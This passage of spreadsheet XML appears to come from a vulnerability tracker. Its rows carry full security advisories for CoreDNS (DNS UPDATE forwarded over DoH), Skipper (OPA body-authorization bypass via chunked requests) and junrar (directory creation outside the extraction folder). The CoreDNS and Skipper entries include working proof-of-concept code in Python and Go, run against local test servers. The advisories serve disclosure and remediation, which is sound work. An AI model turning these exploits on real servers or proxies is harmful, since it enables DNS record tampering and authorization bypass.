      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M35" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr"/>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>### Summary
CoreDNS accepted [RFC 2136](https://datatracker.ietf.org/doc/html/rfc2136) UPDATE messages over DoH, DoH3, DoQ, and DNS-over-gRPC, then allowed the `proxy`/`forward` plugin to send them unchanged to an upstream DNS server. UDP, TCP, and DoT rejected the same opcode before plugin dispatch.
If an update-capable upstream trusts CoreDNS's source address or authenticated connection instead of requiring end-to-end TSIG, an unauthenticated client can use CoreDNS to add, replace, or delete DNS records.
### Details
The affected listeners called `dns.Msg.Unpack` without the request policy used by the UDP/TCP server:
- [DoH and DoH3](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/doh/doh.go#L134-L155)
- [DoQ](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_quic.go#L212-L219)
- [DNS-over-gRPC](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_grpc.go#L176-L184)
CoreDNS routed the message using its Zone question without checking the opcode. [`forward`](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/forward/forward.go#L113-L118) then passed the original message to the [upstream](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/proxy/connect.go#L150-L167).
By contrast, [`dns.DefaultMsgAcceptFunc`](https://github.com/miekg/dns/blob/v1.1.72/acceptfunc.go#L33-L57) allows only QUERY and NOTIFY. The fix applies that policy to the raw header via [`dnsutil.UnpackRequest`](https://github.com/coredns/coredns/blob/530b0a5ff2ad68cc0421f10dd93568945cc671c9/plugin/pkg/dnsutil/message.go#L13-L23) before any affected transport dispatches the request.
### PoC
The reproducer starts a standard-library synthetic DNS upstream on loopback, sends an unsigned UPDATE over DoH, and reports whether the upstream received the record. It supports both UDP and TCP because the `forward` plugin may select either transport. It does not contact or modify a real authoritative server.
Clone the repository and build the server:
```bash
git clone git@github.com:coredns/coredns.git
cd coredns
git checkout d5e54040ffab9a5c12c6de27b66f59f62b385195 # latest pre-fix commit from main
go build -tags=grpcnotrace -o coredns .
```
Save this as `Corefile.poc`:
```text
https://.:8053 {
    bind 127.0.0.1
    tls plugin/tls/test_cert.pem plugin/tls/test_key.pem
    forward . 127.0.0.1:15354
}
```
Save this as `poc.py`:
```python
#!/usr/bin/env python3
import argparse
import http.client
import queue
import socket
import ssl
import struct
import threading
OPCODE_UPDATE = 5
TYPE_A = 1
CLASS_IN = 1
def encode_name(name):
    return b"".join(bytes((len(label),)) + label.encode() for label in name.rstrip(".").split(".")) + b"\x00"
def update_message():
    zone = encode_name("example.com.") + struct.pack("!HH", 6, CLASS_IN)
    update = (
        encode_name("foo.example.com.")
        + struct.pack("!HHIH", TYPE_A, CLASS_IN, 300, 4)
        + socket.inet_aton("192.0.2.123")
    )
    header = struct.pack("!HHHHHH", 0x1234, OPCODE_UPDATE &lt;&lt; 11, 1, 0, 1, 0)
    return header + zone + update
def read_name(message, offset):
    labels = []
    end = None
    seen = set()
    while True:
        if offset &gt;= len(message) or offset in seen:
            raise ValueError("invalid DNS name")
        seen.add(offset)
        length = message[offset]
        if length &amp; 0xC0 == 0xC0:
            if offset + 1 &gt;= len(message):
                raise ValueError("truncated compression pointer")
            if end is None:
                end = offset + 2
            offset = ((length &amp; 0x3F) &lt;&lt; 8) | message[offset + 1]
            continue
        offset += 1
        if length == 0:
            return ".".join(labels) + ".", end if end is not None else offset
        if length &amp; 0xC0 or offset + length &gt; len(message):
            raise ValueError("invalid DNS label")
        labels.append(message[offset : offset + length].decode("ascii"))
        offset += length
def question_end(message, count):
    offset = 12
    for _ in range(count):
        _, offset = read_name(message, offset)
        offset += 4
        if offset &gt; len(message):
            raise ValueError("truncated question")
    return offset
def parse_update(message):
    _, flags, qdcount, _, nscount, _ = struct.unpack_from("!HHHHHH", message)
    if (flags &gt;&gt; 11) &amp; 0xF != OPCODE_UPDATE or qdcount != 1 or nscount &lt; 1:
        return None
    offset = question_end(message, qdcount)
    name, offset = read_name(message, offset)
    rrtype, rrclass, ttl, rdlength = struct.unpack_from("!HHIH", message, offset)
    offset += 10
    rdata = message[offset : offset + rdlength]
    if rrtype != TYPE_A or rrclass != CLASS_IN or len(rdata) != 4:
        return None
    return name, ttl, socket.inet_ntoa(rdata)
def response_for(message):
    ident, flags, qdcount, _, _, _ = struct.unpack_from("!HHHHHH", message)
    end = question_end(message, qdcount)
    response_flags = flags | 0x8000
    return struct.pack("!HHHHHH", ident, response_flags, qdcount, 0, 0, 0) + message[12:end]
def handle_message(message, peer, received):
    try:
        update = parse_update(message)
        response = response_for(message)
    except (ValueError, struct.error):
        return None
    if update is not None:
        received.put((peer, update))
    return response
def serve_udp(sock, received, stopped):
    while not stopped.is_set():
        try:
            message, peer = sock.recvfrom(65535)
        except socket.timeout:
            continue
        except OSError:
            return
        response = handle_message(message, peer, received)
        if response is not None:
            sock.sendto(response, peer)
def recv_exact(connection, size, stopped):
    data = bytearray()
    while len(data) &lt; size and not stopped.is_set():
        try:
            chunk = connection.recv(size - len(data))
        except socket.timeout:
            continue
        if not chunk:
            return None
        data.extend(chunk)
    return bytes(data) if len(data) == size else None
def serve_tcp(sock, received, stopped):
    while not stopped.is_set():
        try:
            connection, peer = sock.accept()
        except socket.timeout:
            continue
        except OSError:
            return
        with connection:
            connection.settimeout(0.1)
            while not stopped.is_set():
                length = recv_exact(connection, 2, stopped)
                if length is None:
                    break
                message = recv_exact(connection, struct.unpack("!H", length)[0], stopped)
                if message is None:
                    break
                response = handle_message(message, peer, received)
                if response is not None:
                    connection.sendall(struct.pack("!H", len(response)) + response)
def send_doh(host, port, payload, timeout):
    context = ssl._create_unverified_context()
    connection = http.client.HTTPSConnection(host, port, timeout=timeout, context=context)
    try:
        connection.request(
            "POST",
            "/dns-query",
            body=payload,
            headers={"Content-Type": "application/dns-message"},
        )
        response = connection.getresponse()
        body = response.read()
        return response.status, len(body)
    finally:
        connection.close()
def main():
    parser = argparse.ArgumentParser(description="Probe whether CoreDNS forwards RFC 2136 UPDATE over DoH")
    parser.add_argument("--host", default="127.0.0.1")
    parser.add_argument("--port", type=int, default=8053)
    parser.add_argument("--upstream-host", default="127.0.0.1")
    parser.add_argument("--upstream-port", type=int, default=15354)
    parser.add_argument("--timeout", type=float, default=2.0)
    parser.add_argument("--expect", choices=("forwarded", "blocked", "either"), default="either")
    args = parser.parse_args()
    received = queue.Queue()
    stopped = threading.Event()
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.settimeout(0.1)
    udp_sock.bind((args.upstream_host, args.upstream_port))
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    tcp_sock.settimeout(0.1)
    tcp_sock.bind((args.upstream_host, args.upstream_port))
    tcp_sock.listen()
    threads = [
        threading.Thread(target=serve_udp, args=(udp_sock, received, stopped), daemon=True),
        threading.Thread(target=serve_tcp, args=(tcp_sock, received, stopped), daemon=True),
    ]
    for thread in threads:
        thread.start()
    payload = update_message()
    try:
        status, response_bytes = send_doh(args.host, args.port, payload, args.timeout)
        try:
            peer, update = received.get(timeout=args.timeout)
        except queue.Empty:
            peer = update = None
    finally:
        stopped.set()
        udp_sock.close()
        tcp_sock.close()
        for thread in threads:
            thread.join(timeout=1)
    print("payload=%d opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123" % len(payload))
    print("http_status=%d response_bytes=%d" % (status, response_bytes))
    if update is None:
        result = "blocked"
        print("upstream_received_update=false")
    else:
        result = "forwarded"
        name, ttl, address = update
        print("upstream_received_update=true source=%s:%d" % peer)
        print("upstream_record=%s %d IN A %s" % (name, ttl, address))
    print("result=%s" % result)
    if args.expect != "either" and args.expect != result:
        raise SystemExit("expected %s, got %s" % (args.expect, result))
if __name__ == "__main__":
    main()
```
Start the vulnerable revision:
```sh
./coredns -conf Corefile.poc
```
In a second terminal, run the probe:
```console
$ python3 poc.py --expect forwarded
payload=60 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123
http_status=200 response_bytes=29
upstream_received_update=true source=127.0.0.1:52391
upstream_record=foo.example.com. 300 IN A 192.0.2.123
result=forwarded
```
The ephemeral source port varies. The output confirms that the upstream saw the complete UPDATE as a request originating from CoreDNS.
For comparison, build and start CoreDNS with the fix:
```sh
git checkout 530b0a5ff2ad68cc0421f10dd93568945cc671c9 # fix commit from main
go build -tags=grpcnotrace -o coredns-fixed .
./coredns-fixed -conf Corefile.poc
```
The same probe is rejected before reaching the synthetic upstream:
```console
$ python3 poc.py --expect blocked
payload=62 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123
http_status=400 response_bytes=16
upstream_received_update=false
result=blocked
```
### Impact
Exploitation requires all of the following:
- an attacker can reach a CoreDNS DoH, DoH3, DoQ, or DNS-over-gRPC listener
- the selected `proxy`/`forward` target accepts RFC 2136 UPDATE
- the upstream trusts CoreDNS's source address or connection and does not require an attacker-unknown TSIG
The upstream sees the UPDATE as originating from CoreDNS. A successful attack can redirect traffic, take over names, alter mail routing, or disrupt the writable zone. Requiring and validating end-to-end TSIG prevents the demonstrated attack.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86003</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86043</t>
        </is>
      </c>
      <c r="D36" s="5" t="inlineStr"/>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>go:github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="M36" s="5" t="inlineStr">
        <is>
          <t>0.27.37</t>
        </is>
      </c>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr"/>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>- **Affected component:** `filters/openpolicyagent/openpolicyagent.go` → `ExtractHttpBodyOptionally`; combined with `github.com/open-policy-agent/opa-envoy-plugin` `envoyauth/request.go` → `getParsedBody` / `checkIfHTTPBodyTruncated`. Filter: `opaAuthorizeRequestWithBody`.
- **Affected versions:** `&lt;= 0.27.33` (current HEAD `e7d7014c`). The `truncated_body` mitigation was introduced/recommended in v0.27.26 (advisory GHSA-8qqm-fp2q-v734) and remains bypassable.
- **Fix chain being audited:** CVE-2026-50197 (GHSA-659f-rgp5-w4wf, commit `3152f3b0`) → GHSA-8qqm-fp2q-v734 (docs + code, commit `1be950cd` #4126, v0.27.26). This finding is the third, still-open variant.
## Summary
Skipper's `opaAuthorizeRequestWithBody` filter authorizes requests by handing the (bounded) request body to Open Policy Agent. When a body exceeds `-open-policy-agent-max-request-body-size` (default 1 MB), Skipper truncates it before OPA sees it. Advisory **GHSA-8qqm-fp2q-v734** established that deny-on-presence / body-inspecting policies fail OPEN on oversized bodies, and its remediation instructs policy authors to **guard on `input.attributes.request.http.truncated_body`** (implemented as the top-level `input.truncated_body`):
```rego
default allow := false
allow if {
    input.truncated_body == false
    # ... body-based conditions
}
```
That mitigation is itself incomplete. The `truncated_body` flag is computed by the OPA envoy plugin **only when a `content-length` header is present**. A request sent with `Transfer-Encoding: chunked` (HTTP/1.1) or over HTTP/2 carries **no `content-length`**, so `truncated_body` is left `false` even though Skipper truncated the body. The mitigated policy therefore evaluates `input.truncated_body == false` as *true* and **ALLOWS** the request, while the **full, un-inspected oversized payload is forwarded to the upstream** (Skipper's `bufferedBodyReader` streams the buffered prefix and then continues draining the original body).
The transport that defeats the mitigation — chunked / HTTP-2 without Content-Length — is the **exact transport class the original CVE-2026-50197 was about**; the GHSA-8qqm fix closed the declared-Content-Length variant and its positive-control test only exercised *small* chunked bodies, never *oversized* chunked bodies.
## Root cause
`opa-envoy-plugin/envoyauth/request.go`:
```go
func getParsedBody(...) (any, bool, error) {
    if val, ok := headers["content-type"]; ok {
        if strings.Contains(val, "application/json") {
            ...
            if val, ok := headers["content-length"]; ok {          // &lt;-- only path that sets truncation
                truncated, err := checkIfHTTPBodyTruncated(val, int64(len(body)))
                ...
                if truncated { return nil, true, nil }
            }
            ...
        } else if ... "application/x-www-form-urlencoded" { /* same content-length gate */ }
          else if ... "multipart/form-data"            { /* same content-length gate */ }
    }
    return data, false, nil     // &lt;-- no content-length  ==&gt; truncated_body = false
}
func checkIfHTTPBodyTruncated(contentLength string, bodyLength int64) (bool, error) {
    cl, _ := strconv.ParseInt(contentLength, 10, 64)
    if cl != -1 &amp;&amp; cl &gt; bodyLength { return true, nil }
    return false, nil
}
```
Truncation can only ever be signalled by comparing `content-length` against the received body length. With chunked/HTTP-2 there is no `content-length`, so the comparison is skipped and `truncated_body` is reported `false`. Skipper (`ExtractHttpBodyOptionally`) meanwhile *does* truncate the chunked body to `maxBodyBytes` (it sets `expectedSize = maxBodyBytes` when `req.ContentLength &lt; 0`), producing the exact divergence: OPA is told "not truncated", but the body was truncated, and the backend receives the whole thing.
## Reachability
1. Deployment runs `opaAuthorizeRequestWithBody` with a body-inspecting policy that follows the GHSA-8qqm mitigation (`allow if input.truncated_body == false`). This is the maintainer-recommended configuration (advisory + v0.27.26 docs).
2. Attacker sends a request whose body exceeds `max-request-body-size` using `Transfer-Encoding: chunked` (or HTTP/2). No `content-length` header is present.
3. `ExtractHttpBodyOptionally` reads/truncates the body to `maxBodyBytes`; `rawBody` is the truncated prefix.
4. `AdaptToExtAuthRequest` forwards the lowercased headers (no `content-length`) and the truncated `RawBody` to OPA.
5. `getParsedBody` finds no `content-length` → `truncated_body = false`; for a non-parsed content-type it also returns `parsed_body = null` with no error.
6. Policy: `input.truncated_body == false` is satisfied → `allow = true`.
7. Skipper forwards the request; `bufferedBodyReader.Read` serves the buffered prefix and then continues reading the original `req.Body`, delivering the **full oversized payload** to the upstream.
Every guard on the path is accounted for: the only "guard" is `truncated_body`, and it is defeated by omitting `content-length`.
## Impact
Bypass of OPA request-body authorization for any deployment that adopted the official `truncated_body` mitigation. Requests that the policy is meant to reject (oversized / un-inspectable bodies, or bodies whose forbidden content lies beyond the inspection window) are authorized and forwarded in full to the protected upstream. Same security property and severity class as CVE-2026-50197 / GHSA-8qqm (both High).
## CVSS 3.1
Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` = **7.5 High**
- **AV:N** — remote HTTP request.
- **AC:L** — single crafted request; no race/special conditions (just chunked framing + padding).
- **PR:N / UI:N** — unauthenticated, no user interaction.
- **S:U** — impact within the authorized component/upstream trust scope.
- **C:N** — no direct disclosure by the bypass itself.
- **I:H** — authorization control is bypassed; forbidden request content reaches the upstream (integrity of the access-control decision / protected resource).
- **A:N** — not primarily an availability issue.
(Conditional: exploitable only where `opaAuthorizeRequestWithBody` is used with a `truncated_body`-gated policy — i.e. deployments that followed the GHSA-8qqm mitigation. Consistent with the conditional nature of the parent CVEs.)
## Proof of Concept
Executable Go test added to the OPA filter package. It stands up a real Skipper proxy (`proxy.WithParams`) + a real OPA control plane (`opasdktest`) with `WithMaxRequestBodyBytes(32)` and the advisory's verbatim mitigation policy (`allow if input.truncated_body == false`), routed to a recording upstream.
- **Positive control** — oversized body **with Content-Length** → `truncated_body=true` → **403** (mitigation works).
- **Bypass** — identical oversized body sent **chunked** (no Content-Length) → `truncated_body=false` → **200**, and the upstream receives the **full** 66-byte payload past the 32-byte inspection cap.
Command and observed benign output:
```
$ go test ./filters/openpolicyagent/ -run TestTruncatedBodyChunkedBypass -count=1 -v
    poc_truncated_body_chunked_test.go:148: [content-length ] status=403 upstream_body_bytes=-1
    poc_truncated_body_chunked_test.go:154: [chunked        ] status=200 upstream_body_bytes=66
--- PASS: TestTruncatedBodyChunkedBypass (0.11s)
PASS
```
- content-length variant → **403**, upstream received nothing (`-1`) — mitigation works.
- chunked variant (byte-identical body) → **200**, upstream received the **full 66-byte** payload past the 32-byte cap — **authorization bypass**.
(Full PoC source is appended below by the submission tool via `--poc-file`.)
## Adversarial re-read (refutation attempts)
- *"Truncated JSON just fails to parse → fail closed."* True for `application/json` when truncation lands mid-token, but the bypass does not rely on JSON: `application/x-www-form-urlencoded` parses leniently after truncation, and unparsed/absent content-types return `(nil, false, nil)` with no error. The load-bearing signal is `truncated_body`, not `parsed_body`, and it is `false` in all these cases.
- *"Maybe Skipper adds a content-length for chunked before OPA sees it."* No — `AdaptToExtAuthRequest` copies `req.Header` verbatim (lowercased); a chunked request has no `content-length` header, and net/http does not synthesise one. Confirmed by reading `skipperadapter.go`.
- *"Maybe the mitigation is `deny if truncated_body == true` (allow-by-default), which is unaffected."* Both shapes in the advisory rely on `truncated_body` correctly reflecting truncation; the deny-if shape simply *fails to deny* under the same chunked condition. The allow-if shape (shown) fails open directly.
- *"Is this already covered by CVE-2026-50197?"* No. 50197 was the *empty-body* chunked bypass (OPA saw no body); its fix makes OPA see the truncated prefix. GHSA-8qqm was the declared-Content-Length oversized variant; its fix populates `parsed_body` and recommends `truncated_body`. Neither addresses `truncated_body` being unset for chunked/HTTP-2 oversized bodies. The 8qqm positive-control test only used small chunked bodies.
Result: survives refutation; concrete, reproducible bypass of the published mitigation. Differentiation check passes (incomplete-fix of a published advisory, not a generic surface bug).
## Remediation
Do not rely on the client-supplied `content-length` header to detect truncation. Skipper should signal truncation authoritatively to OPA rather than delegating to the plugin's Content-Length heuristic. Concretely, in `ExtractHttpBodyOptionally`, detect that the underlying body still has bytes after `maxBodyBytes` were buffered (e.g. attempt one more read / peek) and propagate a definitive truncation indicator — for example by setting a synthetic `content-length` (or a dedicated context extension / metadata field) that reflects the real truncation state, so `input.truncated_body` is `true` whenever the body was actually cut, regardless of transfer encoding. Alternatively, reject (413) requests whose body exceeds `maxBodyBytes` when body-based authorization is enabled, instead of silently truncating. Upstream, `opa-envoy-plugin` should treat "body present but not fully inspectable and no content-length" as truncated rather than defaulting to `false`.
## Confidence
High. Root cause verified in both Skipper and the pinned `opa-envoy-plugin@v1.14.1-envoy` source; executable PoC demonstrates the status/upstream-body divergence against the maintainer's own recommended mitigation.
## Proof-of-Concept source (`poc_truncated_body_chunked_test.go`)
```go
package openpolicyagent_test
import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync/atomic"
	"testing"
	"time"
	opasdktest "github.com/open-policy-agent/opa/v1/sdk/test"
	"github.com/stretchr/testify/assert"
	"github.com/zalando/skipper/eskip"
	"github.com/zalando/skipper/filters"
	"github.com/zalando/skipper/filters/builtin"
	"github.com/zalando/skipper/filters/openpolicyagent"
	"github.com/zalando/skipper/filters/openpolicyagent/opaauthorizerequest"
	"github.com/zalando/skipper/proxy"
	"github.com/zalando/skipper/routing"
	"github.com/zalando/skipper/routing/testdataclient"
)
// TestTruncatedBodyChunkedBypass demonstrates that the GHSA-8qqm-fp2q-v734
// mitigation ("check input.truncated_body in your policy") fails OPEN when the
// oversized request is sent with Transfer-Encoding: chunked (no Content-Length).
//
// The mitigation Rego (verbatim from the advisory):
//
//	default allow := false
//	allow if { input.truncated_body == false }
//
// truncated_body is derived by the OPA envoy plugin ONLY when a content-length
// header is present (opa-envoy-plugin envoyauth/request.go getParsedBody -&gt;
// checkIfHTTPBodyTruncated). A chunked / HTTP-2 request carries no
// content-length, so truncated_body stays false even though Skipper truncated
// the body to max-request-body-size. The mitigated policy therefore ALLOWS an
// oversized body and the full payload reaches upstream.
func TestTruncatedBodyChunkedBypass(t *testing.T) {
	const maxBody = 32
	// oversized url-encoded payload: "a=" + 64 * "A" = 66 bytes &gt; 32.
	payload := "a=" + strings.Repeat("A", 64)
	// upstream records how many body bytes it actually received.
	var upstreamBytes atomic.Int64
	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		n, _ := io.Copy(io.Discard, r.Body)
		upstreamBytes.Store(n)
		w.WriteHeader(200)
		w.Write([]byte("OK"))
	}))
	defer backend.Close()
	bundleName := "test-bundle"
	opaControlPlane := opasdktest.MustNewServer(
		opasdktest.MockBundle("/bundles/"+bundleName, map[string]string{
			// The exact mitigation the advisory recommends.
			"main.rego": `
package envoy.authz
import rego.v1
default allow := false
allow if {
    input.truncated_body == false
}
`,
		}),
	)
	defer opaControlPlane.Stop()
	config := fmt.Appendf(nil, `{
		"services": {"test": {"url": %q}},
		"bundles": {"test": {"resource": "/bundles/{{ .bundlename }}"}},
		"labels": {"environment": "test"},
		"plugins": {"envoy_ext_authz_grpc": {"path": "envoy/authz/allow", "dry-run": false}}
	}`, opaControlPlane.URL())
	opaRegistry, err := openpolicyagent.NewOpenPolicyAgentRegistry(
		openpolicyagent.WithPreloadingEnabled(true),
		openpolicyagent.WithEnableDataPreProcessingOptimization(true),
		openpolicyagent.WithInstanceStartupTimeout(5*time.Second),
		openpolicyagent.WithMaxRequestBodyBytes(maxBody),
		openpolicyagent.WithOpenPolicyAgentInstanceConfig(
			openpolicyagent.WithConfigTemplate(config)),
	)
	if err != nil {
		t.Fatalf("opaRegistry: %v", err)
	}
	defer opaRegistry.Close()
	fr := make(filters.Registry)
	fr.Register(opaauthorizerequest.NewOpaAuthorizeRequestWithBodySpec(opaRegistry))
	fr.Register(builtin.NewSetPath())
	docFmt := `r1: * -&gt; opaAuthorizeRequestWithBody("%s") -&gt; "%s";`
	r := eskip.MustParse(fmt.Sprintf(docFmt, bundleName, backend.URL))
	dc := testdataclient.New(r)
	defer dc.Close()
	rt := routing.New(routing.Options{
		FilterRegistry:  fr,
		DataClients:     []routing.DataClient{dc},
		PreProcessors:   []routing.PreProcessor{opaRegistry.NewPreProcessor()},
		PostProcessors:  []routing.PostProcessor{opaRegistry},
		PollTimeout:     time.Second,
		SignalFirstLoad: true,
	})
	defer rt.Close()
	&lt;-rt.FirstLoad()
	pr := proxy.WithParams(proxy.Params{Routing: rt})
	defer pr.Close()
	ts := httptest.NewServer(pr)
	defer ts.Close()
	inst, err := opaRegistry.GetOrStartInstance(bundleName)
	assert.NoError(t, err)
	assert.NotNil(t, inst)
	doReq := func(chunked bool) (int, int64) {
		upstreamBytes.Store(-1)
		req, err := http.NewRequest("POST", ts.URL, strings.NewReader(payload))
		if err != nil {
			t.Fatalf("new request: %v", err)
		}
		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
		if chunked {
			// Force chunked framing: no Content-Length reaches the server,
			// so the server sees req.ContentLength == -1.
			req.ContentLength = -1
			req.TransferEncoding = []string{"chunked"}
		}
		rsp, err := ts.Client().Do(req)
		if err != nil {
			t.Fatalf("do: %v", err)
		}
		io.Copy(io.Discard, rsp.Body)
		rsp.Body.Close()
		return rsp.StatusCode, upstreamBytes.Load()
	}
	// POSITIVE CONTROL: oversized body WITH Content-Length.
	// truncated_body == true  -&gt; policy denies. Mitigation works as designed.
	clStatus, clUpstream := doReq(false)
	t.Logf("[content-length ] status=%d upstream_body_bytes=%d", clStatus, clUpstream)
	assert.Equal(t, 403, clStatus, "oversized body with Content-Length must be DENIED (mitigation working)")
	// BYPASS: identical oversized body sent CHUNKED (no Content-Length).
	// truncated_body == false -&gt; policy ALLOWS -&gt; full payload reaches upstream.
	chStatus, chUpstream := doReq(true)
	t.Logf("[chunked        ] status=%d upstream_body_bytes=%d", chStatus, chUpstream)
	assert.Equal(t, 200, chStatus, "BYPASS: oversized chunked body was ALLOWED by the truncated_body mitigation")
	assert.Equal(t, int64(len(payload)), chUpstream,
		"BYPASS: upstream received the FULL oversized payload past OPA authorization")
}
```</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86043</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86071</t>
        </is>
      </c>
      <c r="D37" s="5" t="inlineStr"/>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>maven:com.github.junrar:junrar</t>
        </is>
      </c>
      <c r="M37" s="5" t="inlineStr">
        <is>
          <t>7.6.1</t>
        </is>
      </c>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr"/>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>## Summary
`LocalFolderExtractor` validates only the final canonical file path before extraction. However, `makeFile()` creates intermediate directories one path segment at a time without checking whether each created directory remains inside the destination folder.
A malicious RAR entry can make the final file path resolve inside the extraction destination, while causing intermediate `mkdir()` calls to create attacker-chosen directories outside the extraction root.
This is an extraction root escape via unchecked intermediate directory creation. The default impact is directory creation outside the intended destination, not unconditional arbitrary file content write.
## Affected Code
- `src/main/java/com/github/junrar/LocalFolderExtractor.java`
  - `createFile()` checks only the final canonical path.
  - `makeFile()` calls `dir.mkdir()` for each intermediate segment without containment checks.
Relevant code flow:
```java
private File createFile(final FileHeader fh, final File destination) throws IOException {
    String name = invariantSeparatorsPathString(fh.getFileName());
    File f = new File(destination, name);
    String dirCanonPath = f.getCanonicalPath();
    if (!dirCanonPath.startsWith(destination.getCanonicalPath() + File.separator)) {
        throw new IllegalStateException(...);
    }
    if (!f.exists()) {
        f = makeFile(destination, name);
    }
    return f;
}
private File makeFile(final File destination, final String name) throws IOException {
    final String[] dirs = name.split("/");
    String path = "";
    for (int i = 0; i &lt; dirs.length - 1; i++) {
        path = path + File.separator + dirs[i];
        File dir = new File(destination, path);
        dir.mkdir();
    }
    path = path + File.separator + dirs[dirs.length - 1];
    final File f = new File(destination, path);
    f.createNewFile();
    return f;
}
```
## Impact
An attacker who can supply a malicious RAR archive can create directories outside the intended extraction directory.
This violates the expected extraction boundary and can be used for filesystem pollution or file-vs-directory squatting. For example, an attacker can create a directory at a path where a later security-sensitive file is expected, causing future writes to that path to fail.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86071</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88976</t>
        </is>
      </c>
      <c r="D38" s="5" t="inlineStr"/>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>npm:@platejs/core</t>
        </is>
      </c>
      <c r="M38" s="5" t="inlineStr">
        <is>
          <t>53.3.11</t>
        </is>
      </c>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr"/>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
